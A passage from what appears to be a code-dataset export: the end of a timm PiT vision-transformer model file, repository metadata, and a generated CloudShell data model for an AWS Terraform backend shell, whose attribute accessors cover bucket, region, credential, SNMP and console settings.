    """Replace the classifier head(s) with fresh ones producing `num_classes` outputs.

    `global_pool` is accepted for interface compatibility and ignored.
    """
    self.num_classes = num_classes

    def _new_head():
        # Identity stands in for "no classifier" when num_classes == 0.
        return nn.Linear(self.embed_dim, num_classes) if num_classes > 0 else nn.Identity()

    self.head = _new_head()
    if self.head_dist is not None:
        self.head_dist = _new_head()
def forward_features(self, x):
    """Embed patches, run the pooling-transformer stages, and return normalized
    class-token feature(s): a single tensor, or (cls, dist) when distilled."""
    x = self.pos_drop(self.patch_embed(x) + self.pos_embed)
    cls_tokens = self.cls_token.expand(x.shape[0], -1, -1)
    x, cls_tokens = self.transformers((x, cls_tokens))
    cls_tokens = self.norm(cls_tokens)
    if self.head_dist is None:
        return cls_tokens[:, 0]
    return cls_tokens[:, 0], cls_tokens[:, 1]
def forward(self, x):
    """Classify `x`. When distilled: returns both head outputs while training
    (outside TorchScript), otherwise their average."""
    feats = self.forward_features(x)
    if self.head_dist is None:
        return self.head(feats)
    x_cls = self.head(feats[0])
    x_dist = self.head_dist(feats[1])
    if self.training and not torch.jit.is_scripting():
        return x_cls, x_dist
    return (x_cls + x_dist) / 2
def checkpoint_filter_fn(state_dict, model):
    """Remap pretrained checkpoint keys to this module layout.

    Official PiT checkpoints store pooling layers under a top-level
    'pools.<i>.' prefix; this implementation nests them inside each stage as
    'transformers.<i>.pool.'.

    :param state_dict: raw checkpoint state dict
    :param model: target model (unused; kept for the filter-fn interface)
    :return: new dict with remapped keys
    """
    out_dict = {}
    p_blocks = re.compile(r'pools\.(\d)\.')
    for k, v in state_dict.items():
        # NOTE(review): this line was truncated in this copy of the file
        # (read `ol.', k)`); restored from the upstream timm implementation.
        k = p_blocks.sub(lambda exp: f'transformers.{int(exp.group(1))}.pool.', k)
        out_dict[k] = v
    return out_dict
def _create_pit(variant, pretrained=False, **kwargs):
    """Build a PoolingVisionTransformer for the named `variant`.

    :raises RuntimeError: feature extraction mode is not supported for PiT.
    """
    if kwargs.get('features_only', None):
        raise RuntimeError('features_only not implemented for Vision Transformer models.')
    return build_model_with_cfg(
        PoolingVisionTransformer, variant, pretrained,
        default_cfg=default_cfgs[variant],
        pretrained_filter_fn=checkpoint_filter_fn,
        **kwargs)
@register_model
def pit_b_224(pretrained=False, **kwargs):
    """PiT-Base @ 224x224.

    `pretrained` now defaults to False, matching `_create_pit` and the other
    factory functions (it previously had no default — backward compatible).
    """
    model_kwargs = dict(
        patch_size=14, stride=7,
        base_dims=[64, 64, 64], depth=[3, 6, 4], heads=[4, 8, 16],
        mlp_ratio=4, **kwargs)
    return _create_pit('pit_b_224', pretrained, **model_kwargs)
@register_model
def pit_s_224(pretrained=False, **kwargs):
    """PiT-Small @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[48, 48, 48], depth=[2, 6, 4], heads=[3, 6, 12],
        mlp_ratio=4, **kwargs)
    return _create_pit('pit_s_224', pretrained, **model_kwargs)
@register_model
def pit_xs_224(pretrained=False, **kwargs):
    """PiT-XS @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[48, 48, 48], depth=[2, 6, 4], heads=[2, 4, 8],
        mlp_ratio=4, **kwargs)
    return _create_pit('pit_xs_224', pretrained, **model_kwargs)
@register_model
def pit_ti_224(pretrained=False, **kwargs):
    """PiT-Tiny @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[32, 32, 32], depth=[2, 6, 4], heads=[2, 4, 8],
        mlp_ratio=4, **kwargs)
    return _create_pit('pit_ti_224', pretrained, **model_kwargs)
@register_model
def pit_b_distilled_224(pretrained=False, **kwargs):
    """Distilled PiT-Base @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=14, stride=7,
        base_dims=[64, 64, 64], depth=[3, 6, 4], heads=[4, 8, 16],
        mlp_ratio=4, distilled=True, **kwargs)
    return _create_pit('pit_b_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_s_distilled_224(pretrained=False, **kwargs):
    """Distilled PiT-Small @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[48, 48, 48], depth=[2, 6, 4], heads=[3, 6, 12],
        mlp_ratio=4, distilled=True, **kwargs)
    return _create_pit('pit_s_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_xs_distilled_224(pretrained=False, **kwargs):
    """Distilled PiT-XS @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[48, 48, 48], depth=[2, 6, 4], heads=[2, 4, 8],
        mlp_ratio=4, distilled=True, **kwargs)
    return _create_pit('pit_xs_distilled_224', pretrained, **model_kwargs)
@register_model
def pit_ti_distilled_224(pretrained=False, **kwargs):
    """Distilled PiT-Tiny @ 224x224. `pretrained` defaults to False (backward compatible)."""
    model_kwargs = dict(
        patch_size=16, stride=8,
        base_dims=[32, 32, 32], depth=[2, 6, 4], heads=[2, 4, 8],
        mlp_ratio=4, distilled=True, **kwargs)
    return _create_pit('pit_ti_distilled_224', pretrained, **model_kwargs)
| true | true |
f710319effdc93f2a10ac83e341c4ebc2f1204fe | 37,086 | py | Python | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 4 | 2021-11-26T05:41:05.000Z | 2022-03-11T20:01:40.000Z | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 10 | 2021-07-14T05:19:54.000Z | 2021-11-02T05:37:48.000Z | shells/backends/aws_tf_backend/src/data_model.py | oleksandr-r-q/CloudShell-Terraform-Shell | 8d331cf8eebeae794e4e73a3c70af8064bafa434 | [
"Apache-2.0"
] | 1 | 2021-11-01T07:46:59.000Z | 2021-11-01T07:46:59.000Z | from cloudshell.shell.core.driver_context import ResourceCommandContext, AutoLoadDetails, AutoLoadAttribute, \
AutoLoadResource
from collections import defaultdict
class LegacyUtils(object):
    """Migrate flat legacy AutoLoadDetails into the generated data-model classes.

    Fixes vs. original: string identity comparison (`parent is ''`) replaced
    with a falsy check; `dict`-shadowing parameter renamed; the no-op
    `if rank not in dict: pass` guard replaced with an early return (which also
    avoids materializing an empty defaultdict entry).
    """

    def __init__(self):
        self._datamodel_clss_dict = self.__generate_datamodel_classes_dict()

    def migrate_autoload_details(self, autoload_details, context):
        """Build and return the typed resource tree for `context`'s root resource."""
        model_name = context.resource.model
        root_name = context.resource.name
        root = self.__create_resource_from_datamodel(model_name, root_name)
        attributes = self.__create_attributes_dict(autoload_details.attributes)
        self.__attach_attributes_to_resource(attributes, '', root)
        self.__build_sub_resoruces_hierarchy(root, autoload_details.resources, attributes)
        return root

    def __create_resource_from_datamodel(self, model_name, res_name):
        # Instantiate the generated class registered under this model name.
        return self._datamodel_clss_dict[model_name](res_name)

    def __create_attributes_dict(self, attributes_lst):
        # Group attributes by relative address for O(1) lookup during attach.
        grouped = defaultdict(list)
        for attribute in attributes_lst:
            grouped[attribute.relative_address].append(attribute)
        return grouped

    def __build_sub_resoruces_hierarchy(self, root, sub_resources, attributes):
        # Bucket resources by depth so parents are attached before children.
        by_rank = defaultdict(list)
        for resource in sub_resources:
            splitted = resource.relative_address.split('/')
            parent = '' if len(splitted) == 1 else resource.relative_address.rsplit('/', 1)[0]
            by_rank[len(splitted)].append((parent, resource))
        self.__set_models_hierarchy_recursively(by_rank, 1, root, '', attributes)

    def __set_models_hierarchy_recursively(self, rank_map, rank, manipulated_resource,
                                           resource_relative_addr, attributes):
        if rank not in rank_map:
            # No resources at this depth -> recursion bottoms out.
            return
        for (parent, resource) in rank_map[rank]:
            if parent == resource_relative_addr:
                sub_resource = self.__create_resource_from_datamodel(
                    resource.model.replace(' ', ''), resource.name)
                self.__attach_attributes_to_resource(attributes, resource.relative_address, sub_resource)
                manipulated_resource.add_sub_resource(
                    self.__slice_parent_from_relative_path(parent, resource.relative_address),
                    sub_resource)
                self.__set_models_hierarchy_recursively(
                    rank_map, rank + 1, sub_resource, resource.relative_address, attributes)

    def __attach_attributes_to_resource(self, attributes, curr_relative_addr, resource):
        for attribute in attributes[curr_relative_addr]:
            setattr(resource, attribute.attribute_name.lower().replace(' ', '_'),
                    attribute.attribute_value)
        del attributes[curr_relative_addr]

    def __slice_parent_from_relative_path(self, parent, relative_addr):
        if not parent:
            return relative_addr
        return relative_addr[len(parent) + 1:]  # + 1 also drops the '/' separator

    def __generate_datamodel_classes_dict(self):
        return dict(self.__collect_generated_classes())

    def __collect_generated_classes(self):
        # Collect every class defined in this module (the generated data models).
        import sys
        import inspect
        return inspect.getmembers(sys.modules[__name__], inspect.isclass)
class AwsTfBackend(object):
    """Root data model for the 'Aws Tf Backend' CloudShell shell.

    Attribute properties are thin typed views over ``self.attributes``
    (fully-qualified attribute name -> value). Getters use ``dict.get`` so a
    missing attribute reads as None, exactly as the original ``in``-test did.

    NOTE(review): the generated original defined ``cloudshell_model_name``
    twice; the first (no setter, returning 'AwsTfBackend') was dead code,
    silently shadowed by the later definition. Only the effective definition
    is kept here — runtime behavior is unchanged.
    """

    def __init__(self, name):
        """
        :param str name: resource name
        """
        self.attributes = {}
        self.resources = {}
        self._cloudshell_model_name = 'Aws Tf Backend'
        self._name = name

    def add_sub_resource(self, relative_path, sub_resource):
        """Register a child resource model under the given relative address."""
        self.resources[relative_path] = sub_resource

    @classmethod
    def create_from_context(cls, context):
        """
        Creates an instance of AwsTfBackend from the given command context.
        :param context: cloudshell.shell.core.driver_context.ResourceCommandContext
        :type context: cloudshell.shell.core.driver_context.ResourceCommandContext
        :rtype: AwsTfBackend
        """
        result = cls(name=context.resource.name)
        for attr in context.resource.attributes:
            result.attributes[attr] = context.resource.attributes[attr]
        return result

    def create_autoload_details(self, relative_path=''):
        """
        Build AutoLoadDetails for this resource and, recursively, its children.
        :param str relative_path: address of this resource ('' for the root)
        :rtype: AutoLoadDetails
        """
        resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
                                      name=self.resources[r].name,
                                      relative_address=self._get_relative_path(r, relative_path))
                     for r in self.resources]
        attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a])
                      for a in self.attributes]
        autoload_details = AutoLoadDetails(resources, attributes)
        for r in self.resources:
            curr_path = relative_path + '/' + r if relative_path else r
            autoload_details = self._merge_autoload_details(
                autoload_details, self.resources[r].create_autoload_details(curr_path))
        return autoload_details

    def _get_relative_path(self, child_path, parent_path):
        """
        Combine a child's address with its parent's full path.
        :param str child_path: path of a model within its parent, e.g. '1'
        :param str parent_path: full parent path, e.g. '1/1'; empty for root
        :rtype: str
        """
        return parent_path + '/' + child_path if parent_path else child_path

    @staticmethod
    def _merge_autoload_details(autoload_details1, autoload_details2):
        """
        Merge the second AutoLoadDetails into the first, in place.
        :type autoload_details1: AutoLoadDetails
        :type autoload_details2: AutoLoadDetails
        :rtype: AutoLoadDetails
        """
        autoload_details1.attributes.extend(autoload_details2.attributes)
        autoload_details1.resources.extend(autoload_details2.resources)
        return autoload_details1

    @property
    def bucket_name(self):
        """The bucket used to save the Terraform state file (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Bucket Name')

    @bucket_name.setter
    def bucket_name(self, value):
        self.attributes['Aws Tf Backend.Bucket Name'] = value

    @property
    def region_name(self):
        """The region in which the bucket resides (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Region Name')

    @region_name.setter
    def region_name(self, value):
        self.attributes['Aws Tf Backend.Region Name'] = value

    @property
    def access_key(self):
        """AWS access key (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.Access Key')

    @access_key.setter
    def access_key(self, value):
        self.attributes['Aws Tf Backend.Access Key'] = value

    @property
    def secret_key(self):
        """AWS secret key (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.Secret Key')

    @secret_key.setter
    def secret_key(self, value):
        self.attributes['Aws Tf Backend.Secret Key'] = value

    @property
    def cloud_provider(self):
        """Cloud provider whose keys are used when Access/Secret Key are empty (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Cloud Provider')

    @cloud_provider.setter
    def cloud_provider(self, value):
        self.attributes['Aws Tf Backend.Cloud Provider'] = value

    @property
    def hide_address(self):
        """:rtype: str"""
        return self.attributes.get('Aws Tf Backend.hide_address')

    @hide_address.setter
    def hide_address(self, value='true'):
        self.attributes['Aws Tf Backend.hide_address'] = value

    @property
    def user(self):
        """User with administrative privileges (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.User')

    @user.setter
    def user(self, value):
        self.attributes['Aws Tf Backend.User'] = value

    @property
    def password(self):
        """:rtype: string"""
        return self.attributes.get('Aws Tf Backend.Password')

    @password.setter
    def password(self, value):
        self.attributes['Aws Tf Backend.Password'] = value

    @property
    def enable_password(self):
        """Enable password required by some CLI protocols, e.g. Telnet (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.Enable Password')

    @enable_password.setter
    def enable_password(self, value):
        self.attributes['Aws Tf Backend.Enable Password'] = value

    @property
    def power_management(self):
        """Whether orchestration automatically manages device power (:rtype: bool)."""
        return self.attributes.get('Aws Tf Backend.Power Management')

    @power_management.setter
    def power_management(self, value=True):
        self.attributes['Aws Tf Backend.Power Management'] = value

    @property
    def sessions_concurrency_limit(self):
        """Max concurrent driver sessions to the device; default 1 (:rtype: float)."""
        return self.attributes.get('Aws Tf Backend.Sessions Concurrency Limit')

    @sessions_concurrency_limit.setter
    def sessions_concurrency_limit(self, value='1'):
        self.attributes['Aws Tf Backend.Sessions Concurrency Limit'] = value

    @property
    def snmp_read_community(self):
        """SNMP read-only community string (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.SNMP Read Community')

    @snmp_read_community.setter
    def snmp_read_community(self, value):
        self.attributes['Aws Tf Backend.SNMP Read Community'] = value

    @property
    def snmp_write_community(self):
        """SNMP write community string (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.SNMP Write Community')

    @snmp_write_community.setter
    def snmp_write_community(self, value):
        self.attributes['Aws Tf Backend.SNMP Write Community'] = value

    @property
    def snmp_v3_user(self):
        """Relevant only when SNMP V3 is in use (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.SNMP V3 User')

    @snmp_v3_user.setter
    def snmp_v3_user(self, value):
        self.attributes['Aws Tf Backend.SNMP V3 User'] = value

    @property
    def snmp_v3_password(self):
        """Relevant only when SNMP V3 is in use (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.SNMP V3 Password')

    @snmp_v3_password.setter
    def snmp_v3_password(self, value):
        self.attributes['Aws Tf Backend.SNMP V3 Password'] = value

    @property
    def snmp_v3_private_key(self):
        """Relevant only when SNMP V3 is in use (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.SNMP V3 Private Key')

    @snmp_v3_private_key.setter
    def snmp_v3_private_key(self, value):
        self.attributes['Aws Tf Backend.SNMP V3 Private Key'] = value

    @property
    def snmp_v3_authentication_protocol(self):
        """Relevant only when SNMP V3 is in use (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.SNMP V3 Authentication Protocol')

    @snmp_v3_authentication_protocol.setter
    def snmp_v3_authentication_protocol(self, value='No Authentication Protocol'):
        self.attributes['Aws Tf Backend.SNMP V3 Authentication Protocol'] = value

    @property
    def snmp_v3_privacy_protocol(self):
        """Relevant only when SNMP V3 is in use (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.SNMP V3 Privacy Protocol')

    @snmp_v3_privacy_protocol.setter
    def snmp_v3_privacy_protocol(self, value='No Privacy Protocol'):
        self.attributes['Aws Tf Backend.SNMP V3 Privacy Protocol'] = value

    @property
    def snmp_version(self):
        """SNMP version: v1, v2c or v3 (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.SNMP Version')

    @snmp_version.setter
    def snmp_version(self, value=''):
        self.attributes['Aws Tf Backend.SNMP Version'] = value

    @property
    def enable_snmp(self):
        """Auto-enable SNMP on the device before Autoload; True by default (:rtype: bool)."""
        return self.attributes.get('Aws Tf Backend.Enable SNMP')

    @enable_snmp.setter
    def enable_snmp(self, value=True):
        self.attributes['Aws Tf Backend.Enable SNMP'] = value

    @property
    def disable_snmp(self):
        """Auto-disable SNMP after Autoload completes; False by default (:rtype: bool)."""
        return self.attributes.get('Aws Tf Backend.Disable SNMP')

    @disable_snmp.setter
    def disable_snmp(self, value=False):
        self.attributes['Aws Tf Backend.Disable SNMP'] = value

    @property
    def console_server_ip_address(self):
        """Console server IPv4 address (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Console Server IP Address')

    @console_server_ip_address.setter
    def console_server_ip_address(self, value):
        self.attributes['Aws Tf Backend.Console Server IP Address'] = value

    @property
    def console_user(self):
        """:rtype: str"""
        return self.attributes.get('Aws Tf Backend.Console User')

    @console_user.setter
    def console_user(self, value):
        self.attributes['Aws Tf Backend.Console User'] = value

    @property
    def console_port(self):
        """Console-server port (usually TCP) associated with the device (:rtype: float)."""
        return self.attributes.get('Aws Tf Backend.Console Port')

    @console_port.setter
    def console_port(self, value):
        self.attributes['Aws Tf Backend.Console Port'] = value

    @property
    def console_password(self):
        """:rtype: string"""
        return self.attributes.get('Aws Tf Backend.Console Password')

    @console_password.setter
    def console_password(self, value):
        self.attributes['Aws Tf Backend.Console Password'] = value

    @property
    def cli_connection_type(self):
        """CLI connection type: Auto, Console, SSH, Telnet or TCP; default Auto (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.CLI Connection Type')

    @cli_connection_type.setter
    def cli_connection_type(self, value='Auto'):
        self.attributes['Aws Tf Backend.CLI Connection Type'] = value

    @property
    def cli_tcp_port(self):
        """TCP port for CLI; protocol default is used when empty (:rtype: float)."""
        return self.attributes.get('Aws Tf Backend.CLI TCP Port')

    @cli_tcp_port.setter
    def cli_tcp_port(self, value):
        self.attributes['Aws Tf Backend.CLI TCP Port'] = value

    @property
    def backup_location(self):
        """Where save/restore orchestration stores backups (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Backup Location')

    @backup_location.setter
    def backup_location(self, value):
        self.attributes['Aws Tf Backend.Backup Location'] = value

    @property
    def backup_type(self):
        """Backup protocol: 'File System', 'FTP' or 'TFTP'; default 'File System' (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Backup Type')

    @backup_type.setter
    def backup_type(self, value='File System'):
        self.attributes['Aws Tf Backend.Backup Type'] = value

    @property
    def backup_user(self):
        """Username for the backup storage server (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.Backup User')

    @backup_user.setter
    def backup_user(self, value):
        self.attributes['Aws Tf Backend.Backup User'] = value

    @property
    def backup_password(self):
        """Password for the backup storage server (:rtype: string)."""
        return self.attributes.get('Aws Tf Backend.Backup Password')

    @backup_password.setter
    def backup_password(self, value):
        self.attributes['Aws Tf Backend.Backup Password'] = value

    @property
    def name(self):
        """Resource name (:rtype: str)."""
        return self._name

    @name.setter
    def name(self, value):
        self._name = value

    @property
    def cloudshell_model_name(self):
        """The CloudShell model name (:rtype: str)."""
        return self._cloudshell_model_name

    @cloudshell_model_name.setter
    def cloudshell_model_name(self, value):
        self._cloudshell_model_name = value

    @property
    def system_name(self):
        """Unique device identifier from the device terminal/OS, if any (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.System Name')

    @system_name.setter
    def system_name(self, value):
        self.attributes['CS_GenericResource.System Name'] = value

    @property
    def vendor(self):
        """Device manufacturer name (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.Vendor')

    @vendor.setter
    def vendor(self, value=''):
        self.attributes['CS_GenericResource.Vendor'] = value

    @property
    def contact_name(self):
        """Contact name registered in the device (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.Contact Name')

    @contact_name.setter
    def contact_name(self, value):
        self.attributes['CS_GenericResource.Contact Name'] = value

    @property
    def location(self):
        """Physical location identifier, e.g. Lab1/Floor2/Row5/Slot4 (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.Location')

    @location.setter
    def location(self, value=''):
        self.attributes['CS_GenericResource.Location'] = value

    @property
    def model(self):
        """Device model, typically used for abstract resource filtering (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.Model')

    @model.setter
    def model(self, value=''):
        self.attributes['CS_GenericResource.Model'] = value

    @property
    def model_name(self):
        """Catalog model name shown in CloudShell instead of the shell model (:rtype: str)."""
        return self.attributes.get('CS_GenericResource.Model Name')

    @model_name.setter
    def model_name(self, value=''):
        self.attributes['CS_GenericResource.Model Name'] = value
class ResourcePort(object):
    """Port sub-resource data model for the 'Aws Tf Backend' shell.

    NOTE(review): the generated original defined ``cloudshell_model_name``
    twice; the first (no setter, returning 'ResourcePort') was dead code,
    shadowed by the later definition. Only the effective definition is kept —
    runtime behavior is unchanged. Getters use ``dict.get`` (equivalent to the
    original ``in``-test that returned None when missing).
    """

    def __init__(self, name):
        """
        :param str name: port name
        """
        self.attributes = {}
        self.resources = {}
        self._cloudshell_model_name = 'Aws Tf Backend.ResourcePort'
        self._name = name

    def add_sub_resource(self, relative_path, sub_resource):
        """Register a child resource model under the given relative address."""
        self.resources[relative_path] = sub_resource

    @classmethod
    def create_from_context(cls, context):
        """
        Creates an instance of ResourcePort from the given command context.
        :param context: cloudshell.shell.core.driver_context.ResourceCommandContext
        :type context: cloudshell.shell.core.driver_context.ResourceCommandContext
        :rtype: ResourcePort
        """
        result = cls(name=context.resource.name)
        for attr in context.resource.attributes:
            result.attributes[attr] = context.resource.attributes[attr]
        return result

    def create_autoload_details(self, relative_path=''):
        """
        Build AutoLoadDetails for this resource and, recursively, its children.
        :param str relative_path: address of this resource ('' for the root)
        :rtype: AutoLoadDetails
        """
        resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
                                      name=self.resources[r].name,
                                      relative_address=self._get_relative_path(r, relative_path))
                     for r in self.resources]
        attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a])
                      for a in self.attributes]
        autoload_details = AutoLoadDetails(resources, attributes)
        for r in self.resources:
            curr_path = relative_path + '/' + r if relative_path else r
            autoload_details = self._merge_autoload_details(
                autoload_details, self.resources[r].create_autoload_details(curr_path))
        return autoload_details

    def _get_relative_path(self, child_path, parent_path):
        """
        Combine a child's address with its parent's full path.
        :param str child_path: path of a model within its parent, e.g. '1'
        :param str parent_path: full parent path, e.g. '1/1'; empty for root
        :rtype: str
        """
        return parent_path + '/' + child_path if parent_path else child_path

    @staticmethod
    def _merge_autoload_details(autoload_details1, autoload_details2):
        """
        Merge the second AutoLoadDetails into the first, in place.
        :type autoload_details1: AutoLoadDetails
        :type autoload_details2: AutoLoadDetails
        :rtype: AutoLoadDetails
        """
        autoload_details1.attributes.extend(autoload_details2.attributes)
        autoload_details1.resources.extend(autoload_details2.resources)
        return autoload_details1

    @property
    def mac_address(self):
        """:rtype: str"""
        return self.attributes.get('Aws Tf Backend.ResourcePort.MAC Address')

    @mac_address.setter
    def mac_address(self, value=''):
        self.attributes['Aws Tf Backend.ResourcePort.MAC Address'] = value

    @property
    def ipv4_address(self):
        """:rtype: str"""
        return self.attributes.get('Aws Tf Backend.ResourcePort.IPv4 Address')

    @ipv4_address.setter
    def ipv4_address(self, value):
        self.attributes['Aws Tf Backend.ResourcePort.IPv4 Address'] = value

    @property
    def ipv6_address(self):
        """:rtype: str"""
        return self.attributes.get('Aws Tf Backend.ResourcePort.IPv6 Address')

    @ipv6_address.setter
    def ipv6_address(self, value):
        self.attributes['Aws Tf Backend.ResourcePort.IPv6 Address'] = value

    @property
    def port_speed(self):
        """The port speed, e.g. 10Gb/s, 40Gb/s, 100Mb/s (:rtype: str)."""
        return self.attributes.get('Aws Tf Backend.ResourcePort.Port Speed')

    @port_speed.setter
    def port_speed(self, value):
        self.attributes['Aws Tf Backend.ResourcePort.Port Speed'] = value

    @property
    def name(self):
        """Port name (:rtype: str)."""
        return self._name

    @name.setter
    def name(self, value):
        self._name = value

    @property
    def cloudshell_model_name(self):
        """The CloudShell model name (:rtype: str)."""
        return self._cloudshell_model_name

    @cloudshell_model_name.setter
    def cloudshell_model_name(self, value):
        self._cloudshell_model_name = value

    @property
    def model_name(self):
        """Catalog model name shown in CloudShell instead of the shell model (:rtype: str)."""
        return self.attributes.get('CS_Port.Model Name')

    @model_name.setter
    def model_name(self, value=''):
        self.attributes['CS_Port.Model Name'] = value
class GenericPowerPort(object):
def __init__(self, name):
"""
"""
self.attributes = {}
self.resources = {}
self._cloudshell_model_name = 'Aws Tf Backend.GenericPowerPort'
self._name = name
def add_sub_resource(self, relative_path, sub_resource):
self.resources[relative_path] = sub_resource
@classmethod
def create_from_context(cls, context):
"""
Creates an instance of NXOS by given context
:param context: cloudshell.shell.core.driver_context.ResourceCommandContext
:type context: cloudshell.shell.core.driver_context.ResourceCommandContext
:return:
:rtype GenericPowerPort
"""
result = GenericPowerPort(name=context.resource.name)
for attr in context.resource.attributes:
result.attributes[attr] = context.resource.attributes[attr]
return result
def create_autoload_details(self, relative_path=''):
"""
:param relative_path:
:type relative_path: str
:return
"""
resources = [AutoLoadResource(model=self.resources[r].cloudshell_model_name,
name=self.resources[r].name,
relative_address=self._get_relative_path(r, relative_path))
for r in self.resources]
attributes = [AutoLoadAttribute(relative_path, a, self.attributes[a]) for a in self.attributes]
autoload_details = AutoLoadDetails(resources, attributes)
for r in self.resources:
curr_path = relative_path + '/' + r if relative_path else r
curr_auto_load_details = self.resources[r].create_autoload_details(curr_path)
autoload_details = self._merge_autoload_details(autoload_details, curr_auto_load_details)
return autoload_details
def _get_relative_path(self, child_path, parent_path):
"""
Combines relative path
:param child_path: Path of a model within it parent model, i.e 1
:type child_path: str
:param parent_path: Full path of parent model, i.e 1/1. Might be empty for root model
:type parent_path: str
:return: Combined path
:rtype str
"""
return parent_path + '/' + child_path if parent_path else child_path
@staticmethod
def _merge_autoload_details(autoload_details1, autoload_details2):
"""
Merges two instances of AutoLoadDetails into the first one
:param autoload_details1:
:type autoload_details1: AutoLoadDetails
:param autoload_details2:
:type autoload_details2: AutoLoadDetails
:return:
:rtype AutoLoadDetails
"""
for attribute in autoload_details2.attributes:
autoload_details1.attributes.append(attribute)
for resource in autoload_details2.resources:
autoload_details1.resources.append(resource)
return autoload_details1
@property
def cloudshell_model_name(self):
"""
Returns the name of the Cloudshell model
:return:
"""
return 'GenericPowerPort'
@property
def model(self):
    """The device model, typically used for abstract resource filtering.

    :rtype: str
    """
    # dict.get returns None for a missing key, matching the original contract.
    return self.attributes.get('Aws Tf Backend.GenericPowerPort.Model')

@model.setter
def model(self, value):
    """Store the device model.

    :type value: str
    """
    self.attributes['Aws Tf Backend.GenericPowerPort.Model'] = value
@property
def serial_number(self):
    """Serial number reported for the power port.

    :rtype: str
    """
    return self.attributes.get('Aws Tf Backend.GenericPowerPort.Serial Number')

@serial_number.setter
def serial_number(self, value):
    """Store the serial number.

    :type value: str
    """
    self.attributes['Aws Tf Backend.GenericPowerPort.Serial Number'] = value
@property
def version(self):
    """Firmware version of the resource.

    :rtype: str
    """
    return self.attributes.get('Aws Tf Backend.GenericPowerPort.Version')

@version.setter
def version(self, value):
    """Store the firmware version.

    :type value: str
    """
    self.attributes['Aws Tf Backend.GenericPowerPort.Version'] = value
@property
def port_description(self):
    """Description of the port as configured in the device.

    :rtype: str
    """
    return self.attributes.get('Aws Tf Backend.GenericPowerPort.Port Description')

@port_description.setter
def port_description(self, value):
    """Store the port description.

    :type value: str
    """
    self.attributes['Aws Tf Backend.GenericPowerPort.Port Description'] = value
@property
def name(self):
    """Resource name shown in CloudShell.

    :rtype: str
    """
    return self._name

@name.setter
def name(self, value):
    """Set the resource name.

    :type value: str
    """
    self._name = value
@property
def cloudshell_model_name(self):
    """CloudShell model name backing this instance.

    :rtype: str
    """
    return self._cloudshell_model_name

@cloudshell_model_name.setter
def cloudshell_model_name(self, value):
    """Set the CloudShell model name.

    :type value: str
    """
    self._cloudshell_model_name = value
@property
def model_name(self):
    """Catalog name of the device model, shown in CloudShell instead of the model.

    :rtype: str
    """
    return self.attributes.get('CS_PowerPort.Model Name')

@model_name.setter
def model_name(self, value=''):
    """Store the catalog model name.

    :type value: str
    """
    self.attributes['CS_PowerPort.Model Name'] = value
| 33.1125 | 251 | 0.629024 | from cloudshell.shell.core.driver_context import ResourceCommandContext, AutoLoadDetails, AutoLoadAttribute, \
AutoLoadResource
from collections import defaultdict
class LegacyUtils(object):
    """Convert first-generation AutoLoadDetails into the generated data-model classes."""

    def __init__(self):
        # Map of generated datamodel class name -> class object, discovered
        # by inspecting this module.
        self._datamodel_clss_dict = self.__generate_datamodel_classes_dict()

    def migrate_autoload_details(self, autoload_details, context):
        """Rebuild the resource tree described by *autoload_details*.

        :param autoload_details: legacy AutoLoadDetails (flat resource/attribute lists)
        :param context: ResourceCommandContext supplying the root model and name
        :return: root datamodel instance with sub-resources and attributes attached
        """
        model_name = context.resource.model
        root_name = context.resource.name
        root = self.__create_resource_from_datamodel(model_name, root_name)
        attributes = self.__create_attributes_dict(autoload_details.attributes)
        self.__attach_attributes_to_resource(attributes, '', root)
        self.__build_sub_resoruces_hierarchy(root, autoload_details.resources, attributes)
        return root

    def __create_resource_from_datamodel(self, model_name, res_name):
        # Instantiate the generated class registered under *model_name*.
        return self._datamodel_clss_dict[model_name](res_name)

    def __create_attributes_dict(self, attributes_lst):
        # Group attributes by relative address for O(1) lookup while attaching.
        grouped = defaultdict(list)
        for attribute in attributes_lst:
            grouped[attribute.relative_address].append(attribute)
        return grouped

